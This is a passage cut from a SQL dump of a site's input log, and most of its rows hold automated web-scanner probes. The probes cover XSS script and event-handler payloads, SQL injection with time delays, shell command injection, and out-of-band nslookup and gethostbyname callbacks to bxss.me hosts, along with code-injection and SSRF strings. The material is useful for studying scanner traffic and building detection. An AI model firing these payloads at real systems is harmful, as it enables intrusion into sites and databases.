18:14:58'),(8683,'\'.gethostbyname(lc(\'hitme\'.\'gptvpzhn4a930.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(112).chr(81).chr(119).chr(69).\'',6,1,NULL,9,1,1,0,'2021-10-31 18:15:32'),(8689,'\".gethostbyname(lc(\"hitgq\".\"wlfhnmboeb021.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(99).chr(78).chr(100).chr(75).\"',0,1,NULL,9,1,1,0,'2021-10-31 18:15:36'),(8731,'\"+\"A\".concat(70-3).concat(22*4).concat(114).concat(69).concat(102).concat(80)+(require\"socket\"\nSocket.gethostbyname(\"hitpy\"+\"afu',0,1,NULL,9,1,1,0,'2021-10-31 18:16:17'),(8737,'\'+\'A\'.concat(70-3).concat(22*4).concat(100).concat(70).concat(120).concat(81)+(require\'socket\'\nSocket.gethostbyname(\'hitgj\'+\'oeo',30,1,NULL,9,1,1,0,'2021-10-31 18:16:21'),(8820,'913714',0,1,NULL,9,1,1,0,'2021-10-31 18:17:08'),(9020,'thất\'\"()&%<acx><ScRiPt >XqJw(9149)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 18:21:58'),(9022,'\'\"()&%<acx><ScRiPt >XqJw(9605)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 18:22:00'),(9024,'thất9495746',0,1,NULL,9,1,1,0,'2021-10-31 18:22:05'),(9026,'thất9495746<',0,1,NULL,9,1,1,0,'2021-10-31 18:22:09'),(9030,'acu10496＜s1﹥s2ʺs3ʹuca10496',0,1,NULL,9,1,1,0,'2021-10-31 18:22:13'),(9032,'acux4996??z1??z2a?bcxuca4996',0,1,NULL,9,1,1,0,'2021-10-31 18:22:17'),(9052,'acu1345＜s1﹥s2ʺs3ʹuca1345',0,1,NULL,9,1,1,0,'2021-10-31 18:22:55'),(9054,'acux8067??z1??z2a?bcxuca8067',0,1,NULL,9,1,1,0,'2021-10-31 18:22:58'),(9076,'thất\"onmouseover=XqJw(91302)\"',2,1,NULL,9,1,1,0,'2021-10-31 18:23:28'),(9078,'thất\" Yter=XqJw([!+!]) COa=\"',2,1,NULL,9,1,1,0,'2021-10-31 18:23:31'),(9080,'thất\\u0022onmouseover=XqJw(90663)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 18:23:34'),(9082,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%58%71%4A%77%28%39%39%38%34%34%29%22',19,1,NULL,9,1,1,0,'2021-10-31 18:23:38'),(9084,'?\"onmouseover=XqJw(97585)//',0,1,NULL,9,1,1,0,'2021-10-31 18:23:42'),(9086,'thất\"sTYLe=\'acu:Expre/**/SSion(XqJw(9042))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 18:23:45'),(9088,'thất\"><script>XqJw(9319)</script>',2,1,NULL,9,1,1,0,'2021-10-31 18:23:48'),(9090,'thất</title><ScRiPt >XqJw(9014)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 18:23:50'),(9164,'HCDHfXt8',0,1,NULL,9,1,1,0,'2021-10-31 18:55:47'),(9166,'thất\' AND 2*3*8=6*8 AND \'UlI7\'=\'UlI7',37,1,NULL,9,1,1,0,'2021-10-31 18:55:52'),(9168,'thất\" AND 2*3*8=6*8 AND \"wFmA\"=\"wFmA',37,1,NULL,9,1,1,0,'2021-10-31 18:55:56'),(9170,'thất%\' AND 2*3*8=6*8 AND \'91b4\'!=\'91b4%',37,1,NULL,9,1,1,0,'2021-10-31 18:56:00'),(9172,'-1 OR 2+450-450-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 18:56:04'),(9174,'-1 OR 3+450-450-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 18:56:07'),(9176,'-1 OR 3*2<(0+5+450-450)',48,1,NULL,9,1,1,0,'2021-10-31 18:56:10'),(9178,'-1 OR 3*2>(0+5+450-450)',48,1,NULL,9,1,1,0,'2021-10-31 18:56:14'),(9184,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003691310616\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003691310616\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 18:56:54'),(9190,'aaa&shards=http://hitmvuvbowxcr7e413.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 18:56:58'),(9194,'1CQXryVZCAO',0,1,NULL,9,1,1,0,'2021-10-31 18:57:01'),(9218,'response.write(9531966*9516718)',0,1,NULL,9,1,1,0,'2021-10-31 18:57:21'),(9220,'m7sqxU5S',0,1,NULL,9,1,1,0,'2021-10-31 18:57:23'),(9224,'\'+response.write(9531966*9516718)+\'',0,1,NULL,9,1,1,0,'2021-10-31 18:57:25'),(9230,'\"+response.write(9531966*9516718)+\"',0,1,NULL,9,1,1,0,'2021-10-31 18:57:29'),(9286,'${10000267+9999259}',0,1,NULL,9,1,1,0,'2021-10-31 18:57:58'),(9318,'thất&n911051=v952755',2,1,NULL,9,1,1,0,'2021-10-31 18:58:15'),(9324,'echo reazyc$()\\ swkdne\\nz^xyu||a #\' &echo reazyc$()\\ swkdne\\nz^xyu||a #|\" &echo reazyc$()\\ swkdne\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 18:58:17'),(9334,'&echo hvafzp$()\\ sayyvm\\nz^xyu||a #\' &echo hvafzp$()\\ sayyvm\\nz^xyu||a #|\" &echo hvafzp$()\\ sayyvm\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 18:58:21'),(9344,'|echo yeodex$()\\ vymnci\\nz^xyu||a #\' |echo yeodex$()\\ vymnci\\nz^xyu||a #|\" |echo yeodex$()\\ vymnci\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 18:58:27'),(9354,'(nslookup hittlrylwffyxdf302.bxss.me||perl -e \"gethostbyname(\'hittlrylwffyxdf302.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 18:58:31'),(9366,'$(nslookup hithbhpajfyafe57af.bxss.me||perl -e \"gethostbyname(\'hithbhpajfyafe57af.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 18:58:36'),(9370,'\'.gethostbyname(lc(\'hitho\'.\'elccjrpvb5178.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(114).chr(88).chr(106).chr(70).\'',3,1,NULL,9,1,1,0,'2021-10-31 18:58:38'),(9375,'&(nslookup hityatgkawhvea7e17.bxss.me||perl -e \"gethostbyname(\'hityatgkawhvea7e17.bxss.me\')\")&\'\\\"`0&(nslookup hityatgkawhvea7e17',0,1,NULL,9,1,1,0,'2021-10-31 18:58:41'),(9381,'\".gethostbyname(lc(\"hitxr\".\"ijklijtn6bc5a.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(115).chr(67).chr(117).chr(70).\"',0,1,NULL,9,1,1,0,'2021-10-31 18:58:43'),(9385,'|(nslookup hithlvoslocyb89839.bxss.me||perl -e \"gethostbyname(\'hithlvoslocyb89839.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 18:58:45'),(9399,'`(nslookup hitrhghrsruntb6002.bxss.me||perl -e \"gethostbyname(\'hitrhghrsruntb6002.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 18:58:52'),(9409,';(nslookup hitfvptrpogejaf220.bxss.me||perl -e \"gethostbyname(\'hitfvptrpogejaf220.bxss.me\')\")|(nslookup hitfvptrpogejaf220.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 18:58:57'),(9439,'\"+\"A\".concat(70-3).concat(22*4).concat(110).concat(70).concat(97).concat(69)+(require\"socket\"\nSocket.gethostbyname(\"hitxr\"+\"xmgp',0,1,NULL,9,1,1,0,'2021-10-31 18:59:14'),(9451,'\'+\'A\'.concat(70-3).concat(22*4).concat(103).concat(66).concat(122).concat(89)+(require\'socket\'\nSocket.gethostbyname(\'hitik\'+\'eht',27,1,NULL,9,1,1,0,'2021-10-31 18:59:21'),(9530,'916340',0,1,NULL,9,1,1,0,'2021-10-31 19:00:23'),(9708,'oiuWE4SO\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 19:05:03'),(9742,'thất\'\"()&%<acx><ScRiPt >HEl0(9523)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:05:49'),(9744,'\'\"()&%<acx><ScRiPt >HEl0(9957)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 19:05:51'),(9746,'thất9138505',0,1,NULL,9,1,1,0,'2021-10-31 19:05:53'),(9748,'thất9138505<',0,1,NULL,9,1,1,0,'2021-10-31 19:05:57'),(9750,'acu3431＜s1﹥s2ʺs3ʹuca3431',0,1,NULL,9,1,1,0,'2021-10-31 19:06:00'),(9752,'acux2894??z1??z2a?bcxuca2894',0,1,NULL,9,1,1,0,'2021-10-31 19:06:04'),(9754,'5slw7QtL\' OR 776=(SELECT 776 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 19:06:06'),(9774,'acu8106＜s1﹥s2ʺs3ʹuca8106',0,1,NULL,9,1,1,0,'2021-10-31 19:06:34'),(9776,'acux3891??z1??z2a?bcxuca3891',0,1,NULL,9,1,1,0,'2021-10-31 19:06:36'),(9798,'thất\"onmouseover=HEl0(94672)\"',2,1,NULL,9,1,1,0,'2021-10-31 19:07:08'),(9800,'wafAPHt2\') OR 251=(SELECT 251 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 19:07:10'),(9802,'thất\" K3qx=HEl0([!+!]) 8BD=\"',2,1,NULL,9,1,1,0,'2021-10-31 19:07:12'),(9804,'thất\\u0022onmouseover=HEl0(94293)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 19:07:19'),(9806,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%48%45%6C%30%28%39%39%38%39%34%29%22',23,1,NULL,9,1,1,0,'2021-10-31 19:07:24'),(9808,'?\"onmouseover=HEl0(92275)//',0,1,NULL,9,1,1,0,'2021-10-31 19:07:29'),(9810,'thất\"sTYLe=\'acu:Expre/**/SSion(HEl0(9973))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 19:07:35'),(9812,'thất\"><script>HEl0(9712)</script>',2,1,NULL,9,1,1,0,'2021-10-31 19:07:39'),(9814,'thất</title><ScRiPt >HEl0(9568)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:07:42'),(9818,'qfdLSE2M\')) OR 446=(SELECT 446 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 19:08:51'),(9828,'@@f9i0G',0,1,NULL,9,1,1,0,'2021-10-31 19:11:08'),(9860,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003699992408\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003699992408\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 19:23:46'),(9864,'aaa&shards=http://hitgazyhohfqu5640a.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 19:23:49'),(9872,'response.write(9042327*9620424)',0,1,NULL,9,1,1,0,'2021-10-31 19:23:57'),(9876,'\'+response.write(9042327*9620424)+\'',0,1,NULL,9,1,1,0,'2021-10-31 19:24:01'),(9882,'\"+response.write(9042327*9620424)+\"',0,1,NULL,9,1,1,0,'2021-10-31 19:24:07'),(9886,'wU71Ew62',0,1,NULL,9,1,1,0,'2021-10-31 19:24:09'),(9920,'echo mukvli$()\\ fzsqgb\\nz^xyu||a #\' &echo mukvli$()\\ fzsqgb\\nz^xyu||a #|\" &echo mukvli$()\\ fzsqgb\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 19:24:33'),(9926,'&echo qoawmy$()\\ ucffgw\\nz^xyu||a #\' &echo qoawmy$()\\ ucffgw\\nz^xyu||a #|\" &echo qoawmy$()\\ ucffgw\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 19:24:37'),(9928,'${9999971+10000424}',0,1,NULL,9,1,1,0,'2021-10-31 19:24:40'),(9932,'|echo qodtxd$()\\ ioyupr\\nz^xyu||a #\' |echo qodtxd$()\\ ioyupr\\nz^xyu||a #|\" |echo qodtxd$()\\ ioyupr\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 19:24:42'),(9940,'(nslookup hithlecwqaaas99fcf.bxss.me||perl -e \"gethostbyname(\'hithlecwqaaas99fcf.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 19:24:47'),(9946,'thất&n981538=v975705',2,1,NULL,9,1,1,0,'2021-10-31 19:24:52'),(9952,'$(nslookup hityhruhzpaux9a6d5.bxss.me||perl -e \"gethostbyname(\'hityhruhzpaux9a6d5.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 19:24:55'),(9960,'&(nslookup hitfqgbhwvkqh19ea7.bxss.me||perl -e \"gethostbyname(\'hitfqgbhwvkqh19ea7.bxss.me\')\")&\'\\\"`0&(nslookup hitfqgbhwvkqh19ea7',0,1,NULL,9,1,1,0,'2021-10-31 19:25:00'),(9969,'|(nslookup hitbxkblbgogf361d7.bxss.me||perl -e \"gethostbyname(\'hitbxkblbgogf361d7.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 19:25:05'),(9975,'`(nslookup hitaynmdnhfvyd9013.bxss.me||perl -e \"gethostbyname(\'hitaynmdnhfvyd9013.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 19:25:10'),(9977,'\'.gethostbyname(lc(\'hitmg\'.\'wxewwoiw21a14.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(105).chr(79).chr(106).chr(78).\'',3,1,NULL,9,1,1,0,'2021-10-31 19:25:11'),(9985,';(nslookup hitdqqxhwxifw0efdf.bxss.me||perl -e \"gethostbyname(\'hitdqqxhwxifw0efdf.bxss.me\')\")|(nslookup hitdqqxhwxifw0efdf.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 19:25:15'),(9987,'\".gethostbyname(lc(\"hitxl\".\"fyyawlrv73574.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(116).chr(71).chr(107).chr(90).\"',0,1,NULL,9,1,1,0,'2021-10-31 19:25:16'),(10015,'\"+\"A\".concat(70-3).concat(22*4).concat(105).concat(90).concat(101).concat(81)+(require\"socket\"\nSocket.gethostbyname(\"hitov\"+\"feg',0,1,NULL,9,1,1,0,'2021-10-31 19:25:30'),(10029,'\'+\'A\'.concat(70-3).concat(22*4).concat(97).concat(67).concat(114).concat(87)+(require\'socket\'\nSocket.gethostbyname(\'hiteu\'+\'vxys',27,1,NULL,9,1,1,0,'2021-10-31 19:25:38'),(10072,'934629',0,1,NULL,9,1,1,0,'2021-10-31 19:26:05'),(10206,'thất\'\"()&%<acx><ScRiPt >kIkw(9342)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:29:55'),(10208,'\'\"()&%<acx><ScRiPt >kIkw(9392)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 19:30:02'),(10210,'thất9139524',0,1,NULL,9,1,1,0,'2021-10-31 19:30:09'),(10212,'thất9139524<',0,1,NULL,9,1,1,0,'2021-10-31 19:30:14'),(10214,'acu1310＜s1﹥s2ʺs3ʹuca1310',0,1,NULL,9,1,1,0,'2021-10-31 19:30:18'),(10216,'acux9118??z1??z2a?bcxuca9118',0,1,NULL,9,1,1,0,'2021-10-31 19:30:24'),(10240,'acu2364＜s1﹥s2ʺs3ʹuca2364',0,1,NULL,9,1,1,0,'2021-10-31 19:31:24'),(10242,'acux7852??z1??z2a?bcxuca7852',0,1,NULL,9,1,1,0,'2021-10-31 19:31:29'),(10262,'acu6033＜s1﹥s2ʺs3ʹuca6033',0,1,NULL,9,1,1,0,'2021-10-31 19:32:20'),(10264,'acux1952??z1??z2a?bcxuca1952',0,1,NULL,9,1,1,0,'2021-10-31 19:32:23'),(10288,'acu3459＜s1﹥s2ʺs3ʹuca3459',0,1,NULL,9,1,1,0,'2021-10-31 19:33:01'),(10290,'acux3435??z1??z2a?bcxuca3435',0,1,NULL,9,1,1,0,'2021-10-31 19:33:05'),(10310,'thất\"onmouseover=kIkw(98142)\"',2,1,NULL,9,1,1,0,'2021-10-31 19:33:41'),(10312,'thất\" 0fwb=kIkw([!+!]) d7f=\"',2,1,NULL,9,1,1,0,'2021-10-31 19:33:45'),(10314,'thất\\u0022onmouseover=kIkw(99523)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 19:33:49'),(10316,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%6B%49%6B%77%28%39%38%32%34%34%29%22',21,1,NULL,9,1,1,0,'2021-10-31 19:33:52'),(10318,'?\"onmouseover=kIkw(98935)//',0,1,NULL,9,1,1,0,'2021-10-31 19:33:55'),(10320,'thất\"sTYLe=\'acu:Expre/**/SSion(kIkw(9008))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 19:33:58'),(10324,'thất\"><script>kIkw(9756)</script>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:04'),(10326,'thất</title><ScRiPt >kIkw(9873)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:08'),(10330,'thất<ScRiPt >kIkw(9973)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:12'),(10332,'thất<W5JTHP>FRUGS[!+!]</W5JTHP>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:15'),(10334,'thất<script>kIkw(9771)</script>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:18'),(10336,'thất<ScR<ScRiPt>IpT>kIkw(9529)</sCr<ScRiPt>IpT>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:21'),(10338,'thất<ScRiPt \r\n>kIkw(9374)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:24'),(10340,'thất<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9496></ScRiPt>',17,1,NULL,9,1,1,0,'2021-10-31 19:34:27'),(10342,'thất<\0ScRiPt \r\n>kIkw(9163)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:32'),(10344,'thất<svg	\n\r?\0onload=kIkw(9979);>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:34'),(10346,'thất<isindex type=image src=1 onerror=kIkw(9032)>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:37'),(10348,'thất<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9360\'>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:41'),(10350,'thất<body onload=kIkw(9883)>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:42'),(10352,'thất<img src=//xss.bxss.me/t/dot.gif onload=kIkw(9398)>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:45'),(10354,'thất<img src=xyz OnErRor=kIkw(9501)>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:47'),(10356,'thất<img/src=\">\" onerror=alert(9055)>',2,1,NULL,9,1,1,0,'2021-10-31 19:34:50'),(10358,'%74%68%E1%BA%A5%74%3C%53%63%52%69%50%74%20%3E%6B%49%6B%77%289166%29%3C%2F%73%43%72%69%70%54%3E',10,1,NULL,9,1,1,0,'2021-10-31 19:34:54'),(10360,'thất\\u003CScRiPt\\kIkw(9889)\\u003C/sCripT\\u003E',2,1,NULL,9,1,1,0,'2021-10-31 19:34:57'),(10362,'thất&lt;ScRiPt&gt;kIkw(9868)&lt;/sCripT&gt;',2,1,NULL,9,1,1,0,'2021-10-31 19:35:02'),(10364,'?<img acu onmouseover=kIkw(96821) //?>',0,1,NULL,9,1,1,0,'2021-10-31 19:35:06'),(10366,'thất<input autofocus onfocus=kIkw(9964)>',2,1,NULL,9,1,1,0,'2021-10-31 19:35:11'),(10374,'thất}body{acu:Expre/**/SSion(kIkw(9588))}',2,1,NULL,9,1,1,0,'2021-10-31 19:35:21'),(10376,'thất5CUaG\n<ScRiPt >kIkw(9837)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 19:35:24'),(10380,'thất<WRUJHR>NZLVQ[!+!]</WRUJHR>',2,1,NULL,9,1,1,0,'2021-10-31 19:35:28'),(10382,'thất<ifRAme sRc=9179.com></IfRamE>',2,1,NULL,9,1,1,0,'2021-10-31 19:35:31'),(10384,'thất<anPuVL6 x=9574>',2,1,NULL,9,1,1,0,'2021-10-31 19:35:35'),(10386,'thất<img sRc=\'http://attacker-9928/log.php?',2,1,NULL,9,1,1,0,'2021-10-31 19:35:39'),(10388,'thất<ayPUtKQ<',2,1,NULL,9,1,1,0,'2021-10-31 19:35:41'),(10430,'tnn8GeNP',0,1,NULL,9,1,1,0,'2021-10-31 19:45:15'),(10432,'thất\' AND 2*3*8=6*8 AND \'jtbO\'=\'jtbO',37,1,NULL,9,1,1,0,'2021-10-31 19:45:18'),(10434,'thất\" AND 2*3*8=6*8 AND \"g7og\"=\"g7og',37,1,NULL,9,1,1,0,'2021-10-31 19:45:22'),(10436,'thất%\' AND 2*3*8=6*8 AND \'qzeK\'!=\'qzeK%',37,1,NULL,9,1,1,0,'2021-10-31 19:45:25'),(10438,'-1 OR 2+793-793-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 19:45:28'),(10440,'-1 OR 3+793-793-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 19:45:31'),(10442,'-1 OR 3*2<(0+5+793-793)',48,1,NULL,9,1,1,0,'2021-10-31 19:45:34'),(10444,'-1 OR 3*2>(0+5+793-793)',48,1,NULL,9,1,1,0,'2021-10-31 19:45:37'),(10452,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003691598356\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003691598356\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 19:46:17'),(10458,'aaa&shards=http://hitsanohgvlws28977.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 19:46:22'),(10460,'1CAZybN0itO',0,1,NULL,9,1,1,0,'2021-10-31 19:46:23'),(10490,'response.write(9899893*9609724)',0,1,NULL,9,1,1,0,'2021-10-31 19:46:41'),(10500,'ffFwso0Z',0,1,NULL,9,1,1,0,'2021-10-31 19:46:45'),(10502,'\'+response.write(9899893*9609724)+\'',0,1,NULL,9,1,1,0,'2021-10-31 19:46:46'),(10508,'\"+response.write(9899893*9609724)+\"',0,1,NULL,9,1,1,0,'2021-10-31 19:46:49'),(10560,'${10000414+9999310}',0,1,NULL,9,1,1,0,'2021-10-31 19:47:16'),(10588,'thất&n977690=v914760',2,1,NULL,9,1,1,0,'2021-10-31 19:47:27'),(10592,'echo dvzwtj$()\\ iibwno\\nz^xyu||a #\' &echo dvzwtj$()\\ iibwno\\nz^xyu||a #|\" &echo dvzwtj$()\\ iibwno\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 19:47:29'),(10600,'&echo thdaip$()\\ ucywtx\\nz^xyu||a #\' &echo thdaip$()\\ ucywtx\\nz^xyu||a #|\" &echo thdaip$()\\ ucywtx\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 19:47:33'),(10610,'|echo rommmh$()\\ vbbzlb\\nz^xyu||a #\' |echo rommmh$()\\ vbbzlb\\nz^xyu||a #|\" |echo rommmh$()\\ vbbzlb\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 19:47:38'),(10616,'(nslookup hitbmvptwgvmw1d1ec.bxss.me||perl -e \"gethostbyname(\'hitbmvptwgvmw1d1ec.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 19:47:41'),(10624,'$(nslookup hittcuegmtnqi2744e.bxss.me||perl -e \"gethostbyname(\'hittcuegmtnqi2744e.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 19:47:46'),(10630,'\'.gethostbyname(lc(\'hitze\'.\'igzfkcsa11990.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(110).chr(81).chr(115).chr(88).\'',3,1,NULL,9,1,1,0,'2021-10-31 19:47:49'),(10632,'&(nslookup hityajbypvfyj2512e.bxss.me||perl -e \"gethostbyname(\'hityajbypvfyj2512e.bxss.me\')\")&\'\\\"`0&(nslookup hityajbypvfyj2512e',0,1,NULL,9,1,1,0,'2021-10-31 19:47:50'),(10637,'\".gethostbyname(lc(\"hitgs\".\"gjqiqvin2796d.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(116).chr(68).chr(114).chr(72).\"',0,1,NULL,9,1,1,0,'2021-10-31 19:47:54'),(10641,'|(nslookup hitmafxwunjyga2cef.bxss.me||perl -e \"gethostbyname(\'hitmafxwunjyga2cef.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 19:47:56'),(10649,'`(nslookup hitcxspzkggxr73a20.bxss.me||perl -e \"gethostbyname(\'hitcxspzkggxr73a20.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 19:48:00'),(10657,';(nslookup hitiiwswzdwpe03afe.bxss.me||perl -e \"gethostbyname(\'hitiiwswzdwpe03afe.bxss.me\')\")|(nslookup hitiiwswzdwpe03afe.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 19:48:05'),(10693,'\"+\"A\".concat(70-3).concat(22*4).concat(113).concat(75).concat(115).concat(76)+(require\"socket\"\nSocket.gethostbyname(\"hitid\"+\"egj',0,1,NULL,9,1,1,0,'2021-10-31 19:48:23'),(10703,'\'+\'A\'.concat(70-3).concat(22*4).concat(105).concat(79).concat(118).concat(66)+(require\'socket\'\nSocket.gethostbyname(\'hithp\'+\'xgc',26,1,NULL,9,1,1,0,'2021-10-31 19:48:29'),(10806,'998964',0,1,NULL,9,1,1,0,'2021-10-31 19:49:22'),(10990,'zscvNZ4a\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 19:52:19'),(11006,'w887NuOK',0,1,NULL,9,1,1,0,'2021-10-31 19:52:36'),(11010,'thất\' AND 2*3*8=6*8 AND \'8Us8\'=\'8Us8',37,1,NULL,9,1,1,0,'2021-10-31 19:52:39'),(11014,'thất\" AND 2*3*8=6*8 AND \"a3hc\"=\"a3hc',37,1,NULL,9,1,1,0,'2021-10-31 19:52:43'),(11018,'thất%\' AND 2*3*8=6*8 AND \'1ftk\'!=\'1ftk%',37,1,NULL,9,1,1,0,'2021-10-31 19:52:46'),(11022,'-1 OR 2+961-961-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 19:52:50'),(11028,'-1 OR 3+961-961-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 19:52:55'),(11032,'-1 OR 3*2<(0+5+961-961)',48,1,NULL,9,1,1,0,'2021-10-31 19:52:58'),(11036,'-1 OR 3*2>(0+5+961-961)',48,1,NULL,9,1,1,0,'2021-10-31 19:53:01'),(11044,'thất\'\"()&%<acx><ScRiPt >BwLt(9751)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:53:08'),(11048,'\'\"()&%<acx><ScRiPt >BwLt(9835)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 19:53:12'),(11050,'thất9493178',0,1,NULL,9,1,1,0,'2021-10-31 19:53:15'),(11052,'thất9493178<',0,1,NULL,9,1,1,0,'2021-10-31 19:53:17'),(11054,'lFQnc1w1\' OR 112=(SELECT 112 FROM PG_SLEEP(15))--',5,1,NULL,9,1,1,0,'2021-10-31 19:53:18'),(11056,'acu1678＜s1﹥s2ʺs3ʹuca1678',0,1,NULL,9,1,1,0,'2021-10-31 19:53:19'),(11058,'acux2892??z1??z2a?bcxuca2892',0,1,NULL,9,1,1,0,'2021-10-31 19:53:21'),(11078,'acu5514＜s1﹥s2ʺs3ʹuca5514',0,1,NULL,9,1,1,0,'2021-10-31 19:53:44'),(11080,'acux1069??z1??z2a?bcxuca1069',0,1,NULL,9,1,1,0,'2021-10-31 19:53:47'),(11104,'Bc3x0pux\') OR 65=(SELECT 65 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 19:54:13'),(11106,'thất\"onmouseover=BwLt(98292)\"',2,1,NULL,9,1,1,0,'2021-10-31 19:54:14'),(11108,'thất\" Y72k=BwLt([!+!]) TlK=\"',2,1,NULL,9,1,1,0,'2021-10-31 19:54:16'),(11110,'thất\\u0022onmouseover=BwLt(95783)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 19:54:20'),(11112,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%42%77%4C%74%28%39%34%36%31%34%29%22',18,1,NULL,9,1,1,0,'2021-10-31 19:54:23'),(11114,'?\"onmouseover=BwLt(95365)//',0,1,NULL,9,1,1,0,'2021-10-31 19:54:25'),(11116,'thất\"sTYLe=\'acu:Expre/**/SSion(BwLt(9345))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 19:54:28'),(11118,'thất\"><script>BwLt(9413)</script>',2,1,NULL,9,1,1,0,'2021-10-31 19:54:30'),(11120,'thất</title><ScRiPt >BwLt(9050)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 19:54:32'),(11126,'xR6u9SaY\')) OR 577=(SELECT 577 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 19:55:16'),(11138,'@@6Ni7w',0,1,NULL,9,1,1,0,'2021-10-31 19:56:55'),(11148,'8BRBCq5F\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 